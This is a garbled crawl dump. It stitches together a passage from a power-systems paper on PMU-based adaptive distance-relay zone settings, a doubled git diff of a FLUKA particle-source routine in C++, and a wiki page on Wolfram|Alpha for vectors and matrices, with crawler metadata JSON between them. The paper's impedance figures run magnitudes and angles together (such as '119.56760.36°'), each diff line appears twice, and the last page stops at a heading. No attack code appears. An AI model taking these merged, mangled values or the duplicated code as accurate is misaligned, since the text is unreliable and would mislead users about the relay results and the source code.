4.3359, 5.1328 and 2.0313 respectively. The new zone settings of the relay RA as per the proposed methodology are 119.56760.36° and 224.18860.36° as K2 > (K1 & K3). For this condition, the impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-1 since the magnitude of the calculated impedance (|ZCalculated-1|) is less than 59.7835 (Condition 3). Therefore, the relay operates correctly, i.e. in Zone-1 whereas without the proposed methodology the relay RA operates in Zone-2. Thus, the effect of the infeed on the relay RA performance has been eliminated by the proposed methodology. A similar explanation holds good for LG, LL, LLG & LLL faults at 250 km from bus B1 as given in Table 4. Likewise, for double line to ground fault (LLG) with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 2.4688, 4.0469 and 4.375 respectively. Since K3 > (K2 & K1), the new zone settings of the relay RA using 4.375 are 101.91460.36° and 191.09060.36°. The impedance observed by the relay RA is 48.13680.370.\n\nThe relay RA has seen the impedance in Zone-1 since the magnitude of the calculated impedance (|Z Calculated-1|) is less than 50.957 (Condition 3). Therefore, the relay does operate correctly, i.e. in Zone-1 whereas without the proposed methodology the relay RA does not operate. Thus, the infeed at Bus B2 has not affected the performance of the relay RA. A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 7. The fault conditions for all the cases are shown in Table 7 considering a FR of 0.2 Ω at the fault point.\n\nTables 8 and 9 show similar case studies as considered in Table 7 but with FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with a change in FR the relay RA with the proposed methodology functions correctly for all the cases regardless of the infeed condition at Bus B2. Few cases are discussed below for better understanding.\n\nFrom Table 8, consider double line fault (LL) with the same fault conditions as discussed in subsection 4.1 (Table 5). The current coefficients K1, K2 & K3 estimated by the proposed methodology are 4.3359, 5.1328 and 2.0312 respectively. The new zone settings of the relay RA as per the proposed methodology are 119.55860.36° and 224.19160.36° as K2 > (K1 & K3). The impedance observed by the relay RA is 31.75 − 275.120. The relay RA has seen the impedance in Zone-1 because the magnitude of the calculated impedance (|Z Calculated-1|) is less than 59.77 (Condition 3). Therefore, the relay RA with the proposed methodology does operate in the right zone, i.e. Zone-1 whereas without the proposed methodology the relay RA operates in Zone-2. Thus, the mal-operation of the relay RA is averted. Figure 14 displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). The LabVIEW front panel displays glowing LED for Zone-1 fault. Figure 14 also shows the voltage and current phasor data acquired from PMUs at B1 and B4 and the calculated impedance. The fault conditions for all the cases are shown in Table 8 considering a FR of 1.7 Ω at the fault point.\n\nConsider LLG fault with FR of 4.9 Ω at 350 km from Bus B1 as given in Table 9. The current coefficients K1, K2 & K3 estimated by the proposed methodology are 4.3359, 4.75 and 5.0547 respectively. The new zone settings of the relay RA as per the proposed methodology are 117.74860.36° and 220.77760.36° as K3 > (K1 & K2). The impedance observed by the relay RA is 80.61468.660. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|Z Calculated-2|) is less than 110.389 (Condition 4). Therefore, the relay RA with the proposed methodology does operate in the right zone, i.e., Zone-2 whereas without the proposed methodology the relay RA does not operate. The LabVIEW front panel display for LLG fault with FR of 4.9 Ω at 350 km from Bus B1 is shown in Fig. 15. Figure 15 also displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). The voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedances are also shown in Fig. 15. The fault conditions for all the cases are shown in Table 9 considering an FR of 4.9 Ω at the fault point.\n\nThus, from the above elaborated discussion, it is clear that the proposed PAZSD methodology has improved the performance of the conventional distance relay.\n\n### Reliability analysis of the conventional distance protection without and with the proposed methodology\n\nDespite the simple and dependable performance of the conventional distance protective system, the reliability of distance protection is affected when infeed condition exists in MTLs. In-feed conditions jeopardize security in the power system due to the non-adaptive property of distance protection system and provide an obscure view of the system conditions. Further, the function of the conventional distance protection may not be accurate for faults with different fault impedances.\n\nThe reliability attribute of the conventional distance protection with and without the proposed PAZSD methodology has been analyzed in this section as per the definition of reliability .\n\nFrom Table 4, for instance, when an LL fault occurred at 50 km from Bus B1, the relay RA (without the proposed PAZSD methodology) has observed the fault point in Zone-1 which shows that the relay RA operates correctly as per zone settings. Thus, the reliability attribute of the relay has not been influenced by the infeed at Bus B2.\n\nSimilarly, the reliability of the relay had not influenced by the infeed when LG at 50 km, LLG & LLL faults at 150 km from Bus B1 are separately created as given in Table 4. However, when LG fault occurred at 250 km from Bus B1, the relay RA has observed the fault in Zone-2, even though the fault is in Zone-1. Thus, the FR has influenced the reliability of the relay RA. A similar explanation holds good for LG, LL, LLG & LLL faults at 250 km from Bus B1 as given in Table 4. Likewise, when the double line to ground fault (LLG) occurred at 300 km from Bus B1, the relay RA has seen the impedance neither in Zone-1 nor Zone-2. Thus, the infeed at Bus B2 and FR has influenced the reliability of the relay RA. A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 4.\n\nSimilarly, Tables 5 and 6 show similar case studies as discussed in Table 4 but with FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with the change in FR, the reliability of the relay RA has been influenced by many cases because of infeed at Bus B2. However, from Table 7, for the same fault conditions as discussed in Table 4, the reliability of the relay RA has been improved by the proposed PAZSD methodology by changing the zone settings adaptively as per the requirement. Likewise, the reliability of the relay RA has been improved by the proposed methodology for all the case studies as tabulated in Tables 8 to 9.\n\nThe above concise discussion underlines the importance of the proposed methodology in improving the reliability of conventional distance protection during infeed condition and impedance faults in MTLs.\n\n## Conclusions\n\nThis paper proposed a PMU based methodology for adaptive zone settings of distance relays to improve the performance and reliability of distance protection. The operation of distance relays during infeed condition with and without the proposed methodology has been demonstrated through a four-bus model implemented in PSCAD/EMTDC environment. Further, a laboratory prototype of EHV MTLs is considered to validate the performance of distance relays during infeed condition. The PAZSD methodology employs current coefficients to adjust the zone settings of the relays during infeed situations. The results strongly convey that the proposed PAZSD methodology is effective in improving the performance and reliability of distance protection during infeed condition.\n\n## References\n\n1. 1.\n\nAl-Emadi, N. A., Ghorbani, A., & Mehrjerdi, H. (2016). Synchrophasor-based backup distance protection of multi-terminal transmission lines. IET Generation, Transmission & Distribution, 10(13), 3304–3313.\n\n2. 2.\n\nAbe, M., Otsuzuki, N., Emura, T., & Takeuchi, M. (1995). Development of a new fault location system for multi-terminal single transmission lines. IEEE Transactions on Power Delivery, 10(1), 159–168.\n\n3. 3.\n\nNagasawa, T., Abe, M., Otsuzuki, N., Emura, T., Jikihara, Y., & Takeuchi, M. (1991). Development of a new fault location algorithm for multi-terminal two parallel transmission lines (pp. 348–362). Dallas, TX: Proceedings of the 1991 IEEE Power Engineering Society Transmission and Distribution Conference.\n\n4. 4.\n\nFunabashi, T., Otoguro, H., Mizuma, Y., Dube, L., & Ametani, A. (2000). Digital fault location for parallel double-circuit multi-terminal transmission lines. IEEE Transactions on Power Delivery, 15(2), 531–537.\n\n5. 5.\n\nQiu, Z., Xu, Z., & Wang, G. (2006). Relay protection for multi-terminal lines based on multi-agent technology (pp. 7670–7673). Dalian: 6th World Congress on Intelligent Control and Automation.\n\n6. 6.\n\nGajic, Z., Brncic, I., & Rios, F. (2010). Multi-terminal line differential protection with innovative charging current compensation algorithm. 10th IET international conference on developments in power system protection (DPSP 2010) (pp. 1–5). Manchester: Managing the Change.\n\n7. 7.\n\nForford, T., Messing, L., & Stranne, G. (2004). An analogue multi-terminal line differential protection. 8th IEE International Conference on Developments in Power System Protection, 2, 399–403.\n\n8. 8.\n\nArbes, J. (1989). Differential line protection application to multi-terminal lines (pp. 121–124). Edinburgh: 1989 4th International Conference on Developments in Power Protection.\n\n9. 9.\n\nAl-Fakhri, B. (2004). The theory and application of differential protection of multi-terminal lines without synchronization using vector difference as restraint quantity - simulation study. Eighth IEE International Conference on Developments in Power System Protection, 2, 404–409.\n\n10. 10.\n\nHussain, S., & Osman, A. H. (2016). Fault location scheme for multi-terminal transmission lines using unsynchronized measurements. International Journal of Electrical Power & Energy Systems, 78, 277–284.\n\n11. 11.\n\nNgu, E. E., & Ramar, K. (2011). A combined impedance and traveling wave based fault location method for multi-terminal transmission lines. International Journal of Electrical Power & Energy Systems, 33(10), 1767–1775.\n\n12. 12.\n\nZhu, Y., & Fan, X. (2013). Fault location scheme for a multi-terminal transmission line based on current traveling waves. International Journal of Electrical Power & Energy Systems, 53, 367–374.\n\n13. 13.\n\nLien, K.-P., Liu, C.-W., Jiang, J. A., Chen, C.-S., & Yu, C.-S. (2005). A novel fault location algorithm for multi-terminal lines using phasor measurement units (pp. 576–581). Proceedings of the 37th Annual North American power symposium.\n\n14. 14.\n\nBrahma, S. M. (2005). Fault location scheme for a multi-terminal transmission line using synchronized voltage measurements. IEEE Transactions on Power Delivery, 20(2), 1325–1331.\n\n15. 15.\n\nWu, T., Chung, C. Y., Kamwa, I., Li, J., & Qin, M. (2016). Synchrophasor measurement-based fault location technique for multi-terminal multi-section non-homogeneous transmission lines. IET Generation, Transmission & Distribution, 10(8), 1815–1824.\n\n16. 16.\n\nAIEE committee report. (1961). Protection of multiterminal and tapped lines. Transactions of the American Institute of Electrical Engineers. Part III: Power Apparatus and Systems, 80(3), 55–65.\n\n17. 17.\n\nMir, M., & Hasan Imam, M. (1989). Limits to zones of simultaneous tripping in multi-terminal lines (pp. 326–330). Edinburgh: 4th International Conference on Developments in Power Protection.\n\n18. 18.\n\nDinh, M. T. N., Bahadornejad, M., Shahri, A. S. A., & Nair, N. K. C. (2013). Protection schemes and fault location methods for multi-terminal lines: A comprehensive review (pp. 1–6). Bangalore: IEEE Innovative Smart Grid Technologies-Asia (ISGT Asia).\n\n19. 19.\n\nPhadke, A. G., & Thorpe, J. S. (2008). Synchronized phasor measurements and their applications. Springer: Power electronics and power systems series.\n\n## Author information\n\nBM has developed and implemented the proposed algorithm in hardware and simulation. Mr. Shanmukesh contributed towards hardware implementation and Mr. Anmol has contributed to develop the four bus power system model in PSCAD. MJBR has been the technical adviser for the total work and DKM has supported us in interpreting the simulation results and hardware results for eliminating the infeed effect in MTL. All authors have read and approved the final manuscript.\n\nCorrespondence to Maddikara Jaya Bharata Reddy.\n\n## Ethics declarations\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions", null, "" ]
[ null, "https://pcmp.springeropen.com/track/article/10.1186/s41601-018-0087-z", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9157321,"math_prob":0.9222177,"size":39827,"snap":"2019-51-2020-05","text_gpt3_token_len":9555,"char_repetition_ratio":0.1935816,"word_repetition_ratio":0.29776406,"special_character_ratio":0.24229793,"punctuation_ratio":0.13147818,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97622776,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-08T14:26:15Z\",\"WARC-Record-ID\":\"<urn:uuid:7334b28a-52b8-4ed5-b997-f4b0d74790d3>\",\"Content-Length\":\"235852\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b06d4769-1152-477f-b2a3-729742da4014>\",\"WARC-Concurrent-To\":\"<urn:uuid:aee97bdc-5fa4-4bcf-831e-d36b62c81293>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://pcmp.springeropen.com/articles/10.1186/s41601-018-0087-z\",\"WARC-Payload-Digest\":\"sha1:CAG3ON2INPEQWOEJTBB5MLJLXC3H7D6G\",\"WARC-Block-Digest\":\"sha1:FX5XEBXKNNH6KNFF4FFKVN7XZSAQPXLE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540510336.29_warc_CC-MAIN-20191208122818-20191208150818-00244.warc.gz\"}"}
http://git.uio.no/git/?p=u/mrichter/AliRoot.git;a=blobdiff;f=TFluka/source.cxx;h=7720669332a4c84966d8a3a3119e91108ea686ed;hp=ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a;hb=ce60a1360da75d567bf1e946e5d24c7a5eb668e2;hpb=f55b9162da6c2a42c51854272ad118ea8ca81f1c;ds=sidebyside
[ "index ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a..7720669332a4c84966d8a3a3119e91108ea686ed 100644 (file)\n@@ -66,51 +66,58 @@ extern \"C\" {\n\nvoid source(Int_t& nomore) {\n#ifdef METHODDEBUG\n\nvoid source(Int_t& nomore) {\n#ifdef METHODDEBUG\n-    cout << \"==> source(\" << nomore << \")\" << endl;\n+      cout << \"==> source(\" << nomore << \")\" << endl;\n#endif\n\n#endif\n\n-    cout << \"\\t* EPISOR.lsouit = \" << (EPISOR.lsouit?'T':'F') << endl;\n-\n-    static Bool_t lfirst = true;\n-    /*======================================================================*\n-     *                                                                      *\n-     *                 BASIC VERSION                                        *\n-     *                                                                      *\n-     *======================================================================*/\n-    nomore = 0;\n-    /*  +-------------------------------------------------------------------*\n-     *  |  First call initializations:*/\n-    if (lfirst) {\n+      cout << \"\\t* EPISOR.lsouit = \" << (EPISOR.lsouit?'T':'F') << endl;\n\n-      /*|  *** The following 3 cards are mandatory ***/\n+      static Bool_t lfirst = true;\n+      static Bool_t particleIsPrimary = true;\n+      static Bool_t lastParticleWasPrimary = true;\n+\n+      /*  +-------------------------------------------------------------------*\n+       *    First call initializations for FLUKA:                             */\n\n-      EPISOR.tkesum = zerzer;\n-      lfirst = false;\n-      EPISOR.lussrc = true;\n-      /*|  *** User initialization ***/\n-    } else {\n-           TVirtualMCApplication::Instance()->PostTrack();\n-           TVirtualMCApplication::Instance()->FinishPrimary();\n-    }\n-\n-\n-    /*  |\n-     *  +-------------------------------------------------------------------*\n-     *  Push one source particle to the stack. Note that you could as well\n-     *  push many but this way we reserve a maximum amount of space in the\n-     *  stack for the secondaries to be generated\n-     */\n\n+    nomore = 0;\n// Get the pointer to the VMC\nTVirtualMC* fluka = TFluka::GetMC();\n// Get the pointer to the VMC\nTVirtualMC* fluka = TFluka::GetMC();\n-    // Get the stack produced from the generator\n+    // Get the stack\nTVirtualMCStack* cppstack = fluka->GetStack();\nTVirtualMCStack* cppstack = fluka->GetStack();\n-    //Get next particle\n+    TParticle* particle;\nInt_t itrack = -1;\nInt_t itrack = -1;\n-    TParticle* particle = cppstack->PopNextTrack(itrack);\n+    Int_t  nprim  = cppstack->GetNprimary();\n+//  Get the next particle from the stack\n+    particle  = cppstack->PopNextTrack(itrack);\n+\n+//  Is this a secondary not handled by Fluka, i.e. a particle added by user action ?\n+    lastParticleWasPrimary = particleIsPrimary;\n+\n+    if (itrack >= nprim) {\n+       particleIsPrimary = kFALSE;\n+    } else {\n+       particleIsPrimary = kTRUE;\n+    }\n+\n+//    printf(\"--->Got Particle %d %d %d\\n\", itrack, particleIsPrimary, lastParticleWasPrimary);\n+\n+    if (lfirst) {\n+       EPISOR.tkesum = zerzer;\n+       lfirst = false;\n+       EPISOR.lussrc = true;\n+    } else {\n+//\n+// Post-track actions for primary track\n+//\n+       if (particleIsPrimary) {\n+           TVirtualMCApplication::Instance()->PostTrack();\n+           TVirtualMCApplication::Instance()->FinishPrimary();\n+       }\n+    }\n\n//Exit if itrack is negative (-1). Set lsouit to false to mark last track for\n//this event\n\n//Exit if itrack is negative (-1). Set lsouit to false to mark last track for\n//this event\n+\nif (itrack<0) {\nnomore = 1;\nEPISOR.lsouit = false;\nif (itrack<0) {\nnomore = 1;\nEPISOR.lsouit = false;\n@@ -121,14 +128,18 @@ extern \"C\" {\n#endif\nreturn;\n}\n#endif\nreturn;\n}\n-\n+\n//Get some info about the particle and print it\n//Get some info about the particle and print it\n+    //\n+    //pdg code\n+    Int_t pdg = particle->GetPdgCode();\n+\nTVector3 polarisation;\nparticle->GetPolarisation(polarisation);\ncout << \"\\t* Particle \" << itrack << \" retrieved...\" << endl;\ncout << \"\\t\\t+ Name = \" << particle->GetName() << endl;\nTVector3 polarisation;\nparticle->GetPolarisation(polarisation);\ncout << \"\\t* Particle \" << itrack << \" retrieved...\" << endl;\ncout << \"\\t\\t+ Name = \" << particle->GetName() << endl;\n-    cout << \"\\t\\t+ PDG/Fluka code = \" << particle->GetPdgCode()\n-        << \" / \" << fluka->IdFromPDG(particle->GetPdgCode()) << endl;\n+    cout << \"\\t\\t+ PDG/Fluka code = \" << pdg\n+        << \" / \" << fluka->IdFromPDG(pdg) << endl;\ncout << \"\\t\\t+ P = (\"\n<< particle->Px() << \" , \"\n<< particle->Py() << \" , \"\ncout << \"\\t\\t+ P = (\"\n<< particle->Px() << \" , \"\n<< particle->Py() << \" , \"\n@@ -139,60 +150,70 @@ extern \"C\" {\n*/\n\nSTACK.lstack++;\n*/\n\nSTACK.lstack++;\n-    //cout << \"\\t* Storing particle parameters in the stack, lstack = \"\n-    //  << STACK.lstack << endl;\n+\n/* Wt is the weight of the particle*/\nSTACK.wt[STACK.lstack] = oneone;\nSTARS.weipri += STACK.wt[STACK.lstack];\n/* Wt is the weight of the particle*/\nSTACK.wt[STACK.lstack] = oneone;\nSTARS.weipri += STACK.wt[STACK.lstack];\n+\n/* Particle type (1=proton.....). Ijbeam is the type set by the BEAM\n* card\n*/\n/* Particle type (1=proton.....). Ijbeam is the type set by the BEAM\n* card\n*/\n+\n//STACK.ilo[STACK.lstack] = BEAM.ijbeam;\n//STACK.ilo[STACK.lstack] = BEAM.ijbeam;\n-    STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(particle->GetPdgCode());\n+    if (pdg == 50000050 ||  pdg ==  50000051) {\n+       STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(22);\n+    } else {\n+       STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(pdg);\n+    }\n+\n+\n+\n+\n/* From this point .....\n* Particle generation (1 for primaries)\n/* From this point .....\n* Particle generation (1 for primaries)\n-       */\n+    */\nSTACK.lo[STACK.lstack] = 1;\nSTACK.lo[STACK.lstack] = 1;\n+\n/* User dependent flag:*/\nSTACK.louse[STACK.lstack] = 0;\n/* User dependent flag:*/\nSTACK.louse[STACK.lstack] = 0;\n+\n/* User dependent spare variables:*/\nInt_t ispr = 0;\nfor (ispr = 0; ispr < mkbmx1; ispr++)\nSTACK.sparek[STACK.lstack][ispr] = zerzer;\n/* User dependent spare variables:*/\nInt_t ispr = 0;\nfor (ispr = 0; ispr < mkbmx1; ispr++)\nSTACK.sparek[STACK.lstack][ispr] = zerzer;\n+\n/* User dependent spare flags:*/\nfor (ispr = 0; ispr < mkbmx2; ispr++)\nSTACK.ispark[STACK.lstack][ispr] = 0;\n/* User dependent spare flags:*/\nfor (ispr = 0; ispr < mkbmx2; ispr++)\nSTACK.ispark[STACK.lstack][ispr] = 0;\n+\n/* Save the track number of the stack particle:*/\nSTACK.ispark[STACK.lstack][mkbmx2-1] = itrack;\nSTACK.nparma++;\nSTACK.numpar[STACK.lstack] = STACK.nparma;\nSTACK.nevent[STACK.lstack] = 0;\nSTACK.dfnear[STACK.lstack] = +zerzer;\n/* Save the track number of the stack particle:*/\nSTACK.ispark[STACK.lstack][mkbmx2-1] = itrack;\nSTACK.nparma++;\nSTACK.numpar[STACK.lstack] = STACK.nparma;\nSTACK.nevent[STACK.lstack] = 0;\nSTACK.dfnear[STACK.lstack] = +zerzer;\n-      /* ... to this point: don't change anything\n-       * Particle age (s)\n-       */\n+\n+    /* Particle age (s)*/\nSTACK.agestk[STACK.lstack] = +zerzer;\nSTACK.aknshr[STACK.lstack] = -twotwo;\nSTACK.agestk[STACK.lstack] = +zerzer;\nSTACK.aknshr[STACK.lstack] = -twotwo;\n+\n/* Group number for \"low\" energy neutrons, set to 0 anyway*/\nSTACK.igroup[STACK.lstack] = 0;\n/* Group number for \"low\" energy neutrons, set to 0 anyway*/\nSTACK.igroup[STACK.lstack] = 0;\n-    /* Kinetic energy of the particle (GeV)*/\n-    //STACK.tke[STACK.lstack] =\n-    //sqrt( BEAM.pbeam*BEAM.pbeam +\n-    // PAPROP.am[BEAM.ijbeam+6]*PAPROP.am[BEAM.ijbeam+6] )\n-    //- PAPROP.am[BEAM.ijbeam+6];\n-    STACK.tke[STACK.lstack] = particle->Energy() - particle->GetMass();\n+\n+    /* Kinetic energy */\n+    if (pdg == 50000050 ||  pdg ==  50000051) {\n+       //\n+       // Special case for optical photons\n+       STACK.tke[STACK.lstack] = particle->Energy();\n+    } else {\n+       STACK.tke[STACK.lstack] = particle->Energy() - particle->GetMass();\n+    }\n+\n\n/* Particle momentum*/\n\n/* Particle momentum*/\n-    //STACK.pmom [STACK.lstack] = BEAM.pbeam;\nSTACK.pmom [STACK.lstack] = particle->P();\n\nSTACK.pmom [STACK.lstack] = particle->P();\n\n-    /*     PMOM (lstack) = SQRT ( TKE (stack) * ( TKE (lstack) + TWOTWO\n-     *    &                     * AM (ILO(lstack)) ) )\n-     * Cosines (tx,ty,tz)\n-     */\n-    //STACK.tx [STACK.lstack] = BEAM.tinx;\n-    //STACK.ty [STACK.lstack] = BEAM.tiny;\n-    //STACK.tz [STACK.lstack] = BEAM.tinz;\n+    /* Cosines (tx,ty,tz)*/\nDouble_t cosx = particle->Px()/particle->P();\nDouble_t cosy = particle->Py()/particle->P();\nDouble_t cosz = TMath::Sqrt(oneone - cosx*cosx - cosy*cosy);\nDouble_t cosx = particle->Px()/particle->P();\nDouble_t cosy = particle->Py()/particle->P();\nDouble_t cosz = TMath::Sqrt(oneone - cosx*cosx - cosy*cosy);\n@@ -201,30 +222,23 @@ extern \"C\" {\nSTACK.ty [STACK.lstack] = cosy;\nSTACK.tz [STACK.lstack] = cosz;\n\nSTACK.ty [STACK.lstack] = cosy;\nSTACK.tz [STACK.lstack] = cosz;\n\n-    /* Polarization cosines:\n-     */\n-    //STACK.txpol [STACK.lstack] = -twotwo;\n-    //STACK.typol [STACK.lstack] = +zerzer;\n-    //STACK.tzpol [STACK.lstack] = +zerzer;\n+    /* Polarization cosines:*/\nif (polarisation.Mag()) {\nif (polarisation.Mag()) {\n-      Double_t cospolx = polarisation.Px()/polarisation.Mag();\n-      Double_t cospoly = polarisation.Py()/polarisation.Mag();\n-      Double_t cospolz = sqrt(oneone - cospolx*cospolx - cospoly*cospoly);\n-      STACK.tx [STACK.lstack] = cospolx;\n-      STACK.ty [STACK.lstack] = cospoly;\n-      STACK.tz [STACK.lstack] = cospolz;\n+       Double_t cospolx = polarisation.Px()/polarisation.Mag();\n+       Double_t cospoly = polarisation.Py()/polarisation.Mag();\n+       Double_t cospolz = sqrt(oneone - cospolx*cospolx - cospoly*cospoly);\n+       STACK.tx [STACK.lstack] = cospolx;\n+       STACK.ty [STACK.lstack] = cospoly;\n+       STACK.tz [STACK.lstack] = cospolz;\n}\nelse {\n}\nelse {\n-      STACK.txpol [STACK.lstack] = -twotwo;\n-      STACK.typol [STACK.lstack] = +zerzer;\n-      STACK.tzpol [STACK.lstack] = +zerzer;\n+       STACK.txpol [STACK.lstack] = -twotwo;\n+       STACK.typol [STACK.lstack] = +zerzer;\n+       STACK.tzpol [STACK.lstack] = +zerzer;\n}\n\n/* Particle coordinates*/\n}\n\n/* Particle coordinates*/\n-    //STACK.xa [STACK.lstack] = BEAM.xina;\n-    //STACK.ya [STACK.lstack] = BEAM.yina;\n-    //STACK.za [STACK.lstack] = BEAM.zina\n-      //Vertext coordinates;\n+    // Vertext coordinates;\nSTACK.xa [STACK.lstack] = particle->Vx();\nSTACK.ya [STACK.lstack] = particle->Vy();\nSTACK.za [STACK.lstack] = particle->Vz();\nSTACK.xa [STACK.lstack] = particle->Vx();\nSTACK.ya [STACK.lstack] = particle->Vy();\nSTACK.za [STACK.lstack] = particle->Vz();\n@@ -232,11 +246,11 @@ extern \"C\" {\n/*  Calculate the total kinetic energy of the primaries: don't change*/\nInt_t st_ilo =  STACK.ilo[STACK.lstack];\nif ( st_ilo != 0 )\n/*  Calculate the total kinetic energy of the primaries: don't change*/\nInt_t st_ilo =  STACK.ilo[STACK.lstack];\nif ( st_ilo != 0 )\n-      EPISOR.tkesum +=\n-       ((STACK.tke[STACK.lstack] + PAPROP.amdisc[st_ilo+6])\n-        * STACK.wt[STACK.lstack]);\n+       EPISOR.tkesum +=\n+           ((STACK.tke[STACK.lstack] + PAPROP.amdisc[st_ilo+6])\n+            * STACK.wt[STACK.lstack]);\nelse\nelse\n-      EPISOR.tkesum += (STACK.tke[STACK.lstack] * STACK.wt[STACK.lstack]);\n+       EPISOR.tkesum += (STACK.tke[STACK.lstack] * STACK.wt[STACK.lstack]);\n\n/*  Here we ask for the region number of the hitting point.\n*     NREG (LSTACK) = ...\n\n/*  Here we ask for the region number of the hitting point.\n*     NREG (LSTACK) = ...\n@@ -246,21 +260,30 @@ extern \"C\" {\ngeocrs( STACK.tx[STACK.lstack],\nSTACK.ty[STACK.lstack],\nSTACK.tz[STACK.lstack] );\ngeocrs( STACK.tx[STACK.lstack],\nSTACK.ty[STACK.lstack],\nSTACK.tz[STACK.lstack] );\n+\nInt_t idisc;\nInt_t idisc;\n+\ngeoreg ( STACK.xa[STACK.lstack],\nSTACK.ya[STACK.lstack],\nSTACK.za[STACK.lstack],\nSTACK.nreg[STACK.lstack],\nidisc);//<-- dummy return variable not used\ngeoreg ( STACK.xa[STACK.lstack],\nSTACK.ya[STACK.lstack],\nSTACK.za[STACK.lstack],\nSTACK.nreg[STACK.lstack],\nidisc);//<-- dummy return variable not used\n-\n/*  Do not change these cards:*/\nInt_t igeohsm1 = 1;\nInt_t igeohsm2 = -11;\ngeohsm ( STACK.nhspnt[STACK.lstack], igeohsm1, igeohsm2, LTCLCM.mlattc );\nSTACK.nlattc[STACK.lstack] = LTCLCM.mlattc;\nsoevsv();\n/*  Do not change these cards:*/\nInt_t igeohsm1 = 1;\nInt_t igeohsm2 = -11;\ngeohsm ( STACK.nhspnt[STACK.lstack], igeohsm1, igeohsm2, LTCLCM.mlattc );\nSTACK.nlattc[STACK.lstack] = LTCLCM.mlattc;\nsoevsv();\n-    TVirtualMCApplication::Instance()->BeginPrimary();\n-    TVirtualMCApplication::Instance()->PreTrack();\n+//\n+//  Pre-track actions at for primary tracks\n+//\n+    if (particleIsPrimary) {\n+       TVirtualMCApplication::Instance()->BeginPrimary();\n+       TVirtualMCApplication::Instance()->PreTrack();\n+    }\n+\n+//\n+\n#ifdef METHODDEBUG\ncout << \"<== source(\" << nomore << \")\" << endl;\n#endif\n#ifdef METHODDEBUG\ncout << \"<== source(\" << nomore << \")\" << endl;\n#endif" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5190246,"math_prob":0.89409715,"size":741,"snap":"2022-40-2023-06","text_gpt3_token_len":215,"char_repetition_ratio":0.18860245,"word_repetition_ratio":0.0,"special_character_ratio":0.31578946,"punctuation_ratio":0.24,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-24T19:19:47Z\",\"WARC-Record-ID\":\"<urn:uuid:d6d03a52-cf2e-4bbb-bf6c-5db646117fbc>\",\"Content-Length\":\"59116\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:409da7f0-6a6a-4521-8680-3cce5cfdf519>\",\"WARC-Concurrent-To\":\"<urn:uuid:4c5cd47a-b607-43f5-91fe-f54b568c2ff4>\",\"WARC-IP-Address\":\"129.240.118.59\",\"WARC-Target-URI\":\"http://git.uio.no/git/?p=u/mrichter/AliRoot.git;a=blobdiff;f=TFluka/source.cxx;h=7720669332a4c84966d8a3a3119e91108ea686ed;hp=ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a;hb=ce60a1360da75d567bf1e946e5d24c7a5eb668e2;hpb=f55b9162da6c2a42c51854272ad118ea8ca81f1c;ds=sidebyside\",\"WARC-Payload-Digest\":\"sha1:TU754B7CWY7JUGLUKOLCVL6FSVKVNLNK\",\"WARC-Block-Digest\":\"sha1:ILNXW767K6XLLG4QP3PO5MLDGAVN5FPV\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030333455.97_warc_CC-MAIN-20220924182740-20220924212740-00502.warc.gz\"}"}
http://walphawiki.wikidot.com/linear-algebra
[ "Linear Algebra\n\nLet's see how Wolfram|Alpha can handle or help handle typical problems in a linear algebra course.\n\n# Vectors\n\nW|A Query: {2, -5, 4}\n\nResult: Wolfram|Alpha sums the entries in the vector (to get 1), finds the average of the components of the vector (1/3 in this case), computes the length of the vector (about 6.7, given as a decimal approximation and exact number involving a square root), and normalizes the vector.\n\nImplications: Having a tool to quickly determine the length of or normalize vector should be handy for students, particularly in solving complex problems that require many such calculations. It's worth noting that there are no \"Show Steps\" options for these computations, so they don't show students how to perform these computations, for better or for worse.\n\nAs usual, Wolfram|Alpha provide more information than is requested. In this case, seeing the length of a vector along with its normalization might help some students see that there is a connection between these two computations, even if Wolfram|Alpha's results don't really shed any light on what that connection is.\n\n# Matrices\n\nW|A Query: {{2,0},{1,3}}\n\nResult: Wolfram|Alpha provides lots of information about a matrix: its determinant, its trace, its eigenvalues and corresponding eigenvectors, its condition number, and its inverse. Perhaps surprisingly, W|A doesn't provide an echelon form of the matrix. All of the results provided, however, can be expressed in approximate or exact form. No \"Show Steps\" options are provided, however.\n\nW|A also specifies the dimensions of the matrix (which could come in handy if it has been cut-and-pasted from another application) and provides a \"matrix plot\" in which the values of the matrix entries are represented by colors. See below.", null, "Implications: Again, W|A serves as a handy computational aid, but doesn't shed much light on the associated concepts—or even the calculations themselves, given the lack of \"Show Steps.\" Seeing all these computations at once isn't likely to help students who don't already know the connections among them.\n\n## Row 